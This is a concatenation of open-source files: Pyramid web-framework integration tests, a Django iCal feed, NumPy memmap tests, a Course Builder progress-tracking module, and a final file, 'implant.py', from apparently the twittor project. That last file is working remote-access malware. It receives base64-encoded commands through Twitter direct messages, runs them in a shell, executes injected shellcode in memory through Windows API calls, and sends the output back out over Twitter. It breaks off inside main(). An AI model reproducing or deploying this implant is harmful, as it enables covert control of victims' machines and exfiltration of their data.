res = self.testapp.get('/pqr/global2', status=200)
self.assertEqual(res.body, b'global2')
def test_error(self):
res = self.testapp.get('/error', status=200)
self.assertEqual(res.body, b'supressed')
def test_error2(self):
res = self.testapp.get('/error2', status=200)
self.assertEqual(res.body, b'supressed2')
def test_error_sub(self):
res = self.testapp.get('/error_sub', status=200)
self.assertEqual(res.body, b'supressed2')
class TestRestBugApp(IntegrationBase, unittest.TestCase):
# test bug reported by delijati 2010/2/3 (http://pastebin.com/d4cc15515)
package = 'pyramid.tests.pkgs.restbugapp'
def test_it(self):
res = self.testapp.get('/pet', status=200)
self.assertEqual(res.body, b'gotten')
class TestForbiddenAppHasResult(IntegrationBase, unittest.TestCase):
# test that forbidden exception has ACLDenied result attached
package = 'pyramid.tests.pkgs.forbiddenapp'
def test_it(self):
res = self.testapp.get('/x', status=403)
message, result = [x.strip() for x in res.body.split(b'\n')]
self.assertTrue(message.endswith(b'failed permission check'))
self.assertTrue(
result.startswith(b"ACLDenied permission 'private' via ACE "
b"'<default deny>' in ACL "
b"'<No ACL found on any object in resource "
b"lineage>' on context"))
self.assertTrue(
result.endswith(b"for principals ['system.Everyone']"))
class TestViewDecoratorApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.viewdecoratorapp'
def test_first(self):
res = self.testapp.get('/first', status=200)
self.assertTrue(b'OK' in res.body)
def test_second(self):
res = self.testapp.get('/second', status=200)
self.assertTrue(b'OK2' in res.body)
class TestNotFoundView(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.notfoundview'
def test_it(self):
res = self.testapp.get('/wontbefound', status=200)
self.assertTrue(b'generic_notfound' in res.body)
res = self.testapp.get('/bar', status=302)
self.assertEqual(res.location, 'http://localhost/bar/')
res = self.testapp.get('/bar/', status=200)
self.assertTrue(b'OK bar' in res.body)
res = self.testapp.get('/foo', status=302)
self.assertEqual(res.location, 'http://localhost/foo/')
res = self.testapp.get('/foo/', status=200)
self.assertTrue(b'OK foo2' in res.body)
res = self.testapp.get('/baz', status=200)
self.assertTrue(b'baz_notfound' in res.body)
class TestForbiddenView(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.forbiddenview'
def test_it(self):
res = self.testapp.get('/foo', status=200)
self.assertTrue(b'foo_forbidden' in res.body)
res = self.testapp.get('/bar', status=200)
self.assertTrue(b'generic_forbidden' in res.body)
class TestViewPermissionBug(IntegrationBase, unittest.TestCase):
# view_execution_permitted bug as reported by Shane at http://lists.repoze.org/pipermail/repoze-dev/2010-October/003603.html
package = 'pyramid.tests.pkgs.permbugapp'
def test_test(self):
res = self.testapp.get('/test', status=200)
self.assertTrue(b'ACLDenied' in res.body)
def test_x(self):
self.testapp.get('/x', status=403)
class TestDefaultViewPermissionBug(IntegrationBase, unittest.TestCase):
# default_view_permission bug as reported by Wiggy at http://lists.repoze.org/pipermail/repoze-dev/2010-October/003602.html
package = 'pyramid.tests.pkgs.defpermbugapp'
def test_x(self):
res = self.testapp.get('/x', status=403)
self.assertTrue(b'failed permission check' in res.body)
def test_y(self):
res = self.testapp.get('/y', status=403)
self.assertTrue(b'failed permission check' in res.body)
def test_z(self):
res = self.testapp.get('/z', status=200)
self.assertTrue(b'public' in res.body)
from pyramid.tests.pkgs.exceptionviewapp.models import \
AnException, NotAnException
excroot = {'anexception':AnException(),
'notanexception':NotAnException()}
class TestExceptionViewsApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.exceptionviewapp'
root_factory = lambda *arg: excroot
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'maybe' in res.body)
def test_notanexception(self):
res = self.testapp.get('/notanexception', status=200)
self.assertTrue(b'no' in res.body)
def test_anexception(self):
res = self.testapp.get('/anexception', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception(self):
res = self.testapp.get('/route_raise_exception', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception2(self):
res = self.testapp.get('/route_raise_exception2', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception3(self):
res = self.testapp.get('/route_raise_exception3', status=200)
self.assertTrue(b'whoa' in res.body)
def test_route_raise_exception4(self):
res = self.testapp.get('/route_raise_exception4', status=200)
self.assertTrue(b'whoa' in res.body)
def test_raise_httpexception(self):
res = self.testapp.get('/route_raise_httpexception', status=200)
self.assertTrue(b'caught' in res.body)
class TestConflictApp(unittest.TestCase):
package = 'pyramid.tests.pkgs.conflictapp'
def _makeConfig(self):
from pyramid.config import Configurator
config = Configurator()
return config
def test_autoresolved_view(self):
config = self._makeConfig()
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/')
self.assertTrue(b'a view' in res.body)
res = self.testapp.get('/route')
self.assertTrue(b'route view' in res.body)
def test_overridden_autoresolved_view(self):
from pyramid.response import Response
config = self._makeConfig()
config.include(self.package)
def thisview(request):
return Response('this view')
config.add_view(thisview)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/')
self.assertTrue(b'this view' in res.body)
def test_overridden_route_view(self):
from pyramid.response import Response
config = self._makeConfig()
config.include(self.package)
def thisview(request):
return Response('this view')
config.add_view(thisview, route_name='aroute')
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/route')
self.assertTrue(b'this view' in res.body)
def test_nonoverridden_authorization_policy(self):
config = self._makeConfig()
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/protected', status=403)
self.assertTrue(b'403 Forbidden' in res.body)
def test_overridden_authorization_policy(self):
config = self._makeConfig()
config.include(self.package)
from pyramid.testing import DummySecurityPolicy
config.set_authorization_policy(DummySecurityPolicy('fred'))
config.set_authentication_policy(DummySecurityPolicy(permissive=True))
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/protected', status=200)
self.assertTrue('protected view' in res)
class ImperativeIncludeConfigurationTest(unittest.TestCase):
def setUp(self):
from pyramid.config import Configurator
config = Configurator()
from pyramid.tests.pkgs.includeapp1.root import configure
configure(config)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'root' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'two' in res.body)
def test_three(self):
res = self.testapp.get('/three', status=200)
self.assertTrue(b'three' in res.body)
class SelfScanAppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.test_config.pkgs.selfscan import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'root' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'two' in res.body)
class WSGIApp2AppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.pkgs.wsgiapp2app import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_hello(self):
res = self.testapp.get('/hello', status=200)
self.assertTrue(b'Hello' in res.body)
class SubrequestAppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.pkgs.subrequestapp import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_one(self):
res = self.testapp.get('/view_one', status=200)
self.assertTrue(b'This came from view_two' in res.body)
def test_three(self):
res = self.testapp.get('/view_three', status=500)
self.assertTrue(b'Bad stuff happened' in res.body)
def test_five(self):
res = self.testapp.get('/view_five', status=200)
self.assertTrue(b'Value error raised' in res.body)
class RendererScanAppTest(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.rendererscanapp'
def test_root(self):
res = self.testapp.get('/one', status=200)
self.assertTrue(b'One!' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'Two!' in res.body)
def test_rescan(self):
self.config.scan('pyramid.tests.pkgs.rendererscanapp')
app = self.config.make_wsgi_app()
from webtest import TestApp
testapp = TestApp(app)
res = testapp.get('/one', status=200)
self.assertTrue(b'One!' in res.body)
res = testapp.get('/two', status=200)
self.assertTrue(b'Two!' in res.body)
class UnicodeInURLTest(unittest.TestCase):
def _makeConfig(self):
from pyramid.config import Configurator
config = Configurator()
return config
def _makeTestApp(self, config):
from webtest import TestApp
app = config.make_wsgi_app()
return TestApp(app)
def test_unicode_in_url_404(self):
request_path = '/avalia%C3%A7%C3%A3o_participante'
request_path_unicode = b'/avalia\xc3\xa7\xc3\xa3o_participante'.decode('utf-8')
config = self._makeConfig()
testapp = self._makeTestApp(config)
res = testapp.get(request_path, status=404)
# Pyramid default 404 handler outputs:
# u'404 Not Found\n\nThe resource could not be found.\n\n\n'
# u'/avalia\xe7\xe3o_participante\n\n'
self.assertTrue(request_path_unicode in res.text)
def test_unicode_in_url_200(self):
request_path = '/avalia%C3%A7%C3%A3o_participante'
request_path_unicode = b'/avalia\xc3\xa7\xc3\xa3o_participante'.decode('utf-8')
def myview(request):
return 'XXX'
config = self._makeConfig()
config.add_route('myroute', request_path_unicode)
config.add_view(myview, route_name='myroute', renderer='json')
testapp = self._makeTestApp(config)
res = testapp.get(request_path, status=200)
self.assertEqual(res.text, '"XXX"')
class AcceptContentTypeTest(unittest.TestCase):
def setUp(self):
def hello_view(request):
return {'message': 'Hello!'}
from pyramid.config import Configurator
config = Configurator()
config.add_route('hello', '/hello')
config.add_view(hello_view, route_name='hello', accept='text/plain', renderer='string')
config.add_view(hello_view, route_name='hello', accept='application/json', renderer='json')
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
def tearDown(self):
import pyramid.config
pyramid.config.global_registries.empty()
def test_ordering(self):
res = self.testapp.get('/hello', headers={'Accept': 'application/json; q=1.0, text/plain; q=0.9'}, status=200)
self.assertEqual(res.content_type, 'application/json')
res = self.testapp.get('/hello', headers={'Accept': 'text/plain; q=0.9, application/json; q=1.0'}, status=200)
self.assertEqual(res.content_type, 'application/json')
def test_wildcards(self):
res = self.testapp.get('/hello', headers={'Accept': 'application/*'}, status=200)
self.assertEqual(res.content_type, 'application/json')
res = self.testapp.get('/hello', headers={'Accept': 'text/*'}, status=200)
self.assertEqual(res.content_type, 'text/plain')
class DummyContext(object):
pass
class DummyRequest:
subpath = ('__init__.py',)
traversed = None
environ = {'REQUEST_METHOD':'GET', 'wsgi.version':(1,0)}
def get_response(self, application):
return application(None, None)
def httpdate(ts):
return ts.strftime("%a, %d %b %Y %H:%M:%S GMT")
def read_(filename):
with open(filename, 'rb') as fp:
val = fp.read()
return val
def _assertBody(body, filename):
if defaultlocale is None: # pragma: no cover
# If system locale does not have an encoding then default to utf-8
filename = filename.encode('utf-8')
# strip both \n and \r for windows
body = body.replace(b'\r', b'')
body = body.replace(b'\n', b'')
data = read_(filename)
data = data.replace(b'\r', b'')
data = data.replace(b'\n', b'')
assert(body == data)
| cc0-1.0 |
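The integration tests above all follow the same wiring: build a Configurator, include or scan a package, turn it into a WSGI app, and wrap it in WebTest's TestApp. A minimal standalone sketch of that harness follows; the route, view, and body text are illustrative, not taken from the test packages.

# Minimal sketch of the Configurator -> make_wsgi_app -> TestApp wiring
# used by the tests above. Route/view names are hypothetical.
import unittest

from pyramid.config import Configurator
from pyramid.response import Response
from webtest import TestApp


def hello(request):
    return Response('hello')


class MiniIntegrationTest(unittest.TestCase):
    def setUp(self):
        config = Configurator()
        config.add_route('hello', '/hello')
        config.add_view(hello, route_name='hello')
        self.testapp = TestApp(config.make_wsgi_app())

    def test_hello(self):
        res = self.testapp.get('/hello', status=200)
        self.assertTrue(b'hello' in res.body)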
rtucker-mozilla/WhistlePig | whistlepig/ical/ical_entries_feed.py | 1 | 2217 | import datetime
import django_cal
from django_cal.views import Events
import dateutil.rrule as rrule
import whistlepig.whistlepig.models as models
from django.conf import settings
import pytz
class iCalEntriesFeed(Events):
def items(self):
return models.StatusUpdate.objects.filter(is_private = False).all()
def cal_name(self):
return "Mozilla Status Updates"
def cal_desc(self):
return "Mozilla Status Updates"
def item_summary(self, item):
return item.summary
def item_description(self, item):
return item.description
def get_time_as_utc(self, input_time, item):
utc_tz = pytz.timezone('UTC')
pacific_tz = pytz.timezone('America/Los_Angeles')
tmp = datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second)
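# NOTE: this naive copy is only a default; both branches below replace it
# with a localized value, and any non-UTC zone is treated as US Pacific.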
if item.timezone.name != u'UTC':
tmp = pacific_tz.localize(datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second))
else:
tmp = utc_tz.localize(datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second))
return tmp.astimezone(utc_tz)
def item_start(self, item):
return self.get_time_as_utc(item.start_time, item)
def item_end(self, item):
if item.end_time:
return self.get_time_as_utc(item.end_time, item)
else:
return self.get_time_as_utc(item.start_time, item)
def item_categories(self, item):
return [i.service.name for i in item.serviceoutage_set.all()]
def item_url(self, item):
return "%s/detail/%s/" % (settings.SITE_URL, item.id)
def __init__(self, *args, **kwargs):
super(iCalEntriesFeed, self).__init__(*args, **kwargs)
| bsd-3-clause |
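get_time_as_utc() above rebuilds a naive datetime and localizes it before converting to UTC. A minimal sketch of the same pytz pattern, with a made-up wall-clock time:

# Sketch of the localize-then-convert pattern used by get_time_as_utc().
# pytz requires localize() for naive datetimes; passing tzinfo directly to
# the datetime constructor gives wrong offsets for zones with DST history.
import datetime
import pytz

pacific = pytz.timezone('America/Los_Angeles')
utc = pytz.timezone('UTC')

naive = datetime.datetime(2015, 6, 1, 9, 30, 0)   # hypothetical event time
aware = pacific.localize(naive)                   # attach the Pacific zone
print(aware.astimezone(utc))                      # 2015-06-01 16:30:00+00:00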
josecolella/PLD | bin/osx/treasurehunters.app/Contents/Resources/lib/python3.4/numpy/core/tests/test_memmap.py | 65 | 4208 | from __future__ import division, absolute_import, print_function
import sys
from tempfile import NamedTemporaryFile, TemporaryFile, mktemp, mkdtemp
import os
import shutil
from numpy import memmap
from numpy import arange, allclose, asarray
from numpy.testing import *
class TestMemmap(TestCase):
def setUp(self):
self.tmpfp = NamedTemporaryFile(prefix='mmap')
self.tempdir = mkdtemp()
self.shape = (3, 4)
self.dtype = 'float32'
self.data = arange(12, dtype=self.dtype)
self.data.resize(self.shape)
def tearDown(self):
self.tmpfp.close()
shutil.rmtree(self.tempdir)
def test_roundtrip(self):
# Write data to file
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
del fp # Test __del__ machinery, which handles cleanup
# Read data back from file
newfp = memmap(self.tmpfp, dtype=self.dtype, mode='r',
shape=self.shape)
assert_(allclose(self.data, newfp))
assert_array_equal(self.data, newfp)
def test_open_with_filename(self):
tmpname = mktemp('', 'mmap', dir=self.tempdir)
fp = memmap(tmpname, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
del fp
def test_unnamed_file(self):
with TemporaryFile() as f:
fp = memmap(f, dtype=self.dtype, shape=self.shape)
del fp
def test_attributes(self):
offset = 1
mode = "w+"
fp = memmap(self.tmpfp, dtype=self.dtype, mode=mode,
shape=self.shape, offset=offset)
self.assertEqual(offset, fp.offset)
self.assertEqual(mode, fp.mode)
del fp
def test_filename(self):
tmpname = mktemp('', 'mmap', dir=self.tempdir)
fp = memmap(tmpname, dtype=self.dtype, mode='w+',
shape=self.shape)
abspath = os.path.abspath(tmpname)
fp[:] = self.data[:]
self.assertEqual(abspath, fp.filename)
b = fp[:1]
self.assertEqual(abspath, b.filename)
del b
del fp
def test_filename_fileobj(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode="w+",
shape=self.shape)
self.assertEqual(fp.filename, self.tmpfp.name)
@dec.knownfailureif(sys.platform=='gnu0', "This test is known to fail on hurd")
def test_flush(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
assert_equal(fp[0], self.data[0])
fp.flush()
def test_del(self):
# Make sure a view does not delete the underlying mmap
fp_base = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp_base[0] = 5
fp_view = fp_base[0:1]
assert_equal(fp_view[0], 5)
del fp_view
# Should still be able to access and assign values after
# deleting the view
assert_equal(fp_base[0], 5)
fp_base[0] = 6
assert_equal(fp_base[0], 6)
def test_arithmetic_drops_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
tmp = (fp + 10)
if isinstance(tmp, memmap):
assert tmp._mmap is not fp._mmap
def test_indexing_drops_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
tmp = fp[[(1, 2), (2, 3)]]
if isinstance(tmp, memmap):
assert tmp._mmap is not fp._mmap
def test_slicing_keeps_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
assert fp[:2, :2]._mmap is fp._mmap
def test_view(self):
fp = memmap(self.tmpfp, dtype=self.dtype, shape=self.shape)
new1 = fp.view()
new2 = new1.view()
assert(new1.base is fp)
assert(new2.base is fp)
new_array = asarray(fp)
assert(new_array.base is fp)
if __name__ == "__main__":
run_module_suite()
| mit |
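For reference, the write/read round trip exercised by test_roundtrip() above looks like this outside the test harness; the temp-file path is illustrative.

# Standalone sketch of the memmap round trip from test_roundtrip().
import os
import tempfile

import numpy as np

path = os.path.join(tempfile.mkdtemp(), 'demo.mmap')  # hypothetical path
data = np.arange(12, dtype='float32').reshape(3, 4)

fp = np.memmap(path, dtype='float32', mode='w+', shape=(3, 4))
fp[:] = data[:]
del fp                                # flush and close via __del__

readback = np.memmap(path, dtype='float32', mode='r', shape=(3, 4))
assert np.allclose(data, readback)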
andela-angene/coursebuilder-core | coursebuilder/modules/manual_progress/manual_progress.py | 3 | 10308 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module allowing manual marking of unit/lesson progress."""
__author__ = 'Mike Gainer ([email protected])'
import os
import jinja2
import appengine_config
from common import crypto
from common import tags
from common import utils as common_utils
from controllers import utils
from models import custom_modules
from models import progress
from models import transforms
from modules.courses import lessons
custom_module = None
MODULE_NAME = 'Manual Progress'
XSRF_ACTION = 'manual_progress'
TEMPLATES_DIR = os.path.join(
appengine_config.BUNDLE_ROOT, 'modules', 'manual_progress', 'templates')
RESOURCES_PATH = '/modules/manual_progress/resources'
# pylint: disable=unbalanced-tuple-unpacking
class ProgressRESTBase(utils.BaseRESTHandler):
def _perform_checks(self):
success = False
key = self.request.params.get('key')
student = self.get_student()
course = self.get_course()
if not self.assert_xsrf_token_or_fail(
self.request.params, XSRF_ACTION, {'key': key}):
pass
elif not key:
transforms.send_json_response(
self, 400, 'Bad Request.', {})
elif not student or student.is_transient or not student.is_enrolled:
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
elif not course:
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
elif not self.app_context.is_editable_fs():
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
success = True
return success, key, student, course
def _send_success_response(self, key, status):
transforms.send_json_response(
self, 200, 'OK.', {'key': key,
'status': status})
class CourseProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/course'
def _perform_checks(self):
_progress = None
success, key, student, course = (
super(CourseProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
return success, key, student, _progress
def _send_success_response(self, key, student, _progress):
super(CourseProgressRESTHandler, self)._send_success_response(
key,
_progress.get_course_status(
_progress.get_or_create_progress(student)))
def get(self):
success, key, student, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, _progress)
def post(self):
success, key, student, _progress = self._perform_checks()
if success:
_progress.force_course_completed(student)
self._send_success_response(key, student, _progress)
class UnitProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/unit'
def _perform_checks(self):
unit = None
_progress = None
success, key, student, course = (
super(UnitProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
unit = course.find_unit_by_id(key)
if not unit:
success = False
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
return success, key, student, unit, _progress
def _send_success_response(self, key, student, unit, _progress):
super(UnitProgressRESTHandler, self)._send_success_response(
key,
_progress.get_unit_status(
_progress.get_or_create_progress(student),
unit.unit_id))
def get(self):
success, key, student, unit, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, unit, _progress)
def post(self):
success, key, student, unit, _progress = self._perform_checks()
if success:
if not unit.manual_progress:
success = False
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
_progress.force_unit_completed(student, unit.unit_id)
self._send_success_response(key, student, unit, _progress)
class LessonProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/lesson'
def _perform_checks(self):
lesson = None
_progress = None
success, key, student, course = (
super(LessonProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
lesson = common_utils.find(lambda l: str(l.lesson_id) == key,
course.get_lessons_for_all_units())
if not lesson:
success = False
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
return success, key, student, lesson, _progress
def _send_success_response(self, key, student, lesson, _progress):
super(LessonProgressRESTHandler, self)._send_success_response(
key,
_progress.get_lesson_status(
_progress.get_or_create_progress(student),
lesson.unit_id,
lesson.lesson_id))
def get(self):
success, key, student, lesson, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, lesson, _progress)
def post(self):
success, key, student, lesson, _progress = self._perform_checks()
if success:
if not lesson.manual_progress:
success = False
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
_progress.put_html_completed(
student, lesson.unit_id, lesson.lesson_id)
self._send_success_response(key, student, lesson, _progress)
def _build_completion_button_for_unit_lesson_page(
app_context, course, unit, lesson, assessment, student_view, student):
return _build_completion_button(app_context, course, student, unit, lesson)
def _build_completion_button_for_course_page(
app_context, course, student_view, student):
return _build_completion_button(app_context, course, student, None, None)
def _build_completion_button(app_context, course, student, unit, lesson):
"""Add manual-completion buttons to footer of syllabus/unit/lesson pages."""
if not student or student.is_transient:
return None
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(XSRF_ACTION)
template_data = {}
# Course force-completion is coded and working, but there's no
# UI/UX that cares about it in the base code. This is left here as
# a convenience, in case some particular course needs to have manual
# course completion. The general course won't, so we suppress this
# button from appearing on all course content pages.
#
#template_data['course'] = {
# 'url': CourseProgressRESTHandler.URI.lstrip('/'),
# 'key': None,
# 'xsrf_token': xsrf_token,
#}
tracker = None
_progress = None
COMPLETED_STATE = progress.UnitLessonCompletionTracker.COMPLETED_STATE
if (unit and unit.manual_progress) or (lesson and lesson.manual_progress):
tracker = course.get_progress_tracker()
_progress = tracker.get_or_create_progress(student)
if unit and unit.manual_progress:
if tracker.get_unit_status(
_progress, unit.unit_id) != COMPLETED_STATE:
template_data['unit'] = {
'url': UnitProgressRESTHandler.URI.lstrip('/'),
'key': str(unit.unit_id),
'xsrf_token': xsrf_token,
}
if lesson and lesson.manual_progress:
if tracker.get_lesson_status(
_progress, lesson.unit_id, lesson.lesson_id) != COMPLETED_STATE:
template_data['lesson'] = {
'url': LessonProgressRESTHandler.URI.lstrip('/'),
'key': str(lesson.lesson_id),
'xsrf_token': xsrf_token,
}
if template_data:
template_environ = app_context.get_template_environ(
app_context.get_current_locale(), [TEMPLATES_DIR])
return jinja2.Markup(
template_environ.get_template('manual_progress.html').render(
template_data))
return None
def register_module():
def notify_module_enabled():
lessons.UnitHandler.EXTRA_CONTENT.append(
_build_completion_button_for_unit_lesson_page)
lessons.CourseHandler.EXTRA_CONTENT.append(
_build_completion_button_for_course_page)
global_routes = [
(os.path.join(RESOURCES_PATH, 'js', '.*'), tags.JQueryHandler),
(os.path.join(RESOURCES_PATH, '.*'), tags.ResourcesHandler)]
namespaced_handlers = [
(CourseProgressRESTHandler.URI, CourseProgressRESTHandler),
(UnitProgressRESTHandler.URI, UnitProgressRESTHandler),
(LessonProgressRESTHandler.URI, LessonProgressRESTHandler),
]
global custom_module # pylint: disable=global-statement
custom_module = custom_modules.Module(
MODULE_NAME,
'Manual marking of unit/lesson progress',
global_routes, namespaced_handlers,
notify_module_enabled=notify_module_enabled)
return custom_module
| apache-2.0 |
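The three REST handlers above share one contract: a key query parameter (unit or lesson id), an xsrf_token minted for XSRF_ACTION, and a JSON body of {'key': ..., 'status': ...} on success. A hedged sketch of a client POST; the host, lesson id, and token are placeholders (the real token comes from crypto.XsrfTokenManager.create_xsrf_token).

# Hypothetical client call against LessonProgressRESTHandler.
import urllib
import urllib2

params = urllib.urlencode({
    'key': '42',                       # lesson_id, per _perform_checks()
    'xsrf_token': 'TOKEN-PLACEHOLDER',
})
url = 'https://example.com/rest/student/progress/lesson?' + params
response = urllib2.urlopen(url, data='')  # non-None data makes this a POST
body = response.read()                    # JSON: {"key": "42", "status": ...}
print(body)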
xujun10110/twittor | implant.py | 18 | 5478 | from tweepy import Stream
from tweepy import OAuthHandler
from tweepy import API
from tweepy.streaming import StreamListener
from uuid import getnode as get_mac
import ctypes
import json
import threading
import subprocess
import base64
import platform
api = None
# Placeholder credentials; these values are filled in before deployment.

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
MAC_ADDRESS = ':'.join(("%012X" % get_mac())[i:i + 2] for i in range(0, 12, 2))
#
# Exception for Twittor
#
class TwittorException(Exception):
"""
Base exception
"""
def __init__(self, message, errors):
Exception.__init__(self, message)
self.errors = errors
#
# Decoding exception when decoding a message
#
class DecodingException(TwittorException):
"""
Exception when trying to decode a CommandOutput
"""
#
# Class to parse received Command
#
class CommandToExecute:
def __init__(self, message):
try:
data = json.loads(base64.b64decode(message))
self.data = data
self.sender = data['sender']
self.receiver = data['receiver']
self.cmd = data['cmd']
self.jobid = data['jobid']
except:
raise DecodingException('Error decoding message: %s' % message)
def is_for_me(self):
global MAC_ADDRESS
return MAC_ADDRESS == self.receiver or self.cmd == 'PING' and 'output' not in self.data
def retrieve_command(self):
return self.jobid, self.cmd
#
# Class to build Command to send
#
class CommandOutput:
def __init__(self, sender, receiver, output, jobid, cmd):
self.sender = sender
self.receiver = receiver
self.output = output
self.cmd = cmd
self.jobid = jobid
def build(self):
cmd = {'sender': self.sender,
'receiver': self.receiver,
'output': self.output,
'cmd': self.cmd,
'jobid': self.jobid}
return base64.b64encode(json.dumps(cmd))
#
# Execute shellcode on a separate thread
#
class ExecuteShellcode(threading.Thread):
def __init__(self, jobid, shellc):
threading.Thread.__init__(self)
self.shellc = shellc
self.jobid = jobid
self.daemon = True
self.start()
def run(self):
try:
shellcode = bytearray(self.shellc)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
except Exception as e:
print e
pass
#
# Execute Command on a separate thread
#
class ExecuteCommand(threading.Thread):
def __init__(self, jobid, cmd):
threading.Thread.__init__(self)
self.jobid = jobid
self.command = cmd
self.daemon = True
self.start()
def run(self):
if (self.command == 'PING'):
output = platform.platform()
else:
output = subprocess.check_output(self.command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
output_command = CommandOutput(MAC_ADDRESS, 'master', output, self.jobid, self.command)
api.send_direct_message(user=USERNAME, text=output_command.build())
#
# Listener to stream Twitter messages and intercept Direct Messages
#
class StdOutListener(StreamListener):
def on_data(self, status):
try:
data = json.loads(status)
if data['direct_message'] and data['direct_message']['sender_screen_name'] == USERNAME:
try:
cmd = CommandToExecute(data['direct_message']['text'])
if (cmd.is_for_me()):
jobid, cmd = cmd.retrieve_command()
print 'jobid: %s, cmd to execute: %s' % (jobid, cmd)
if (cmd.split(' ')[0] == 'shellcode'):
sc = base64.b64decode(cmd.split(' ')[1]).decode('string-escape')
ExecuteShellcode(jobid, sc)
else:
ExecuteCommand(jobid, cmd)
except:
pass
except:
print 'Did not manage to decode %s' % status
return True
def main():
global api
try:
auth = OAuthHandler(CONSUMER_TOKEN, CONSUMER_SECRET)
auth.secure = True
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
